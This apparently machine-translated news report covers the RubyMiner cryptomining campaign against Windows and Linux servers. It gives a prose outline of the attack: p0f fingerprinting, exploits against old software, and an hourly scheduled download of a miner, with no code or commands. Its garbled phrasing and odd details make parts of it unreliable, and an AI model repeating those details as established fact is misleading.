Specialists in cybersecurity from a Check Point company, Ixia, and Certegy found that more than 700 servers on Windows and Linux are infected with malicious software RubyMiner, used for the latent of mining cryptocurrency. The first attacks were noticed last week, but the epidemic took on a mass character only a few days ago.
Nevertheless, cybersecurity experts are sure that hackers have just begun to deploy their massive activities, which means that in the future many more servers can be attacked.
Since the minor works on servers under Windows and Linux, hackers use the utility p0f to determine the type of server software. If the software is old, the burglars launch special exploits that infect the server with a malicious miner who extracts cryptocurrency at the expense of other people’s capacities and without the knowledge of their owners.
Under Linux, the exploit code erases all tasks and sets a new one: every hour a certain script is downloaded from the specified resource to the server, which installs the software for the mining. In some cases, after attacks on the server is set PyCryptoMiner. Sometimes attackers attack Oracle WebLogic servers for the cryptocurrency.
While the scale is not large: purses that are connected to RubyMiner, contain cryptocurrency only 540 dollars, but hackers attacking the WebLogic server, for several months could mint several hundred thousand dollars.